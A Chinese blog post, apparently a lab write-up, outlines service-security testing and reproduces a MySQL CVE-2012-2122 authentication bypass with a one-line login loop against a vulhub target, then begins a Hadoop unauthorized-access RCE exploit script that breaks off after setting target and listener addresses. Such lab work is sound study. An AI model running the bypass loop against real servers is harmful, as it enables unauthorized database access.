数据库服务安全--Mysql未授权--Hadoop未授权配合RCE--Redis未授权&RCE

前言:昨天做了几个靶场,分享一下成果。

 

首先我们了解一下服务安全,服务安全测试流程第一步就是判断服务开放(1.端口扫描2.组合猜解3.信息来源),如果一个服务都没开启那么我们是无法漏洞利用的;其次是判断服务类型(1.数据库2.文件传输3.远程控制4.数据通讯等);最后判断利用方式(1.特性漏洞2.未授权访问3.弱口令爆破)。端口即服务(服务安全的前提是看服务有没有开放),信息来源是通过报错、网站的源码等来源。

本文知识点:

1.Mysql--CVE-2012-2122

2.Hadoop--配置不当未授权三重奏&RCE漏洞

3.Redis--配置不当未授权三重奏&RCE两漏洞

Mysql--未授权访问-CVE-2012-2122利用

复现环境:vulhub 内置端口3306

pyload:for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done

该漏洞利用比较简单,原理就是利用for循环去猜解他的账号密码,当尝试多次以后就会直接进入数据库(逻辑错误)--报错报错突然就进去了。

Mysql的弱口令猜解有一定的限制:

mysql默认配置本地登录root用户,远程的连接请求拒绝 

但是我们可以借助phpmyadmin猜解,phpmyadmin第三方的数据库管理应用 搭建在对方的服务器;phpmyadmin登录mysql数据库,这个数据库发送是由本地到本地的过程 所以可以进行测试。

Hadoop--未授权访问-内置配合命令执行RCE(端口:50010等)

复现环境:vulfocus

EXP:

import requests
target = '目标 ip'
lhost = '监听ip' # put your local host ip here
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值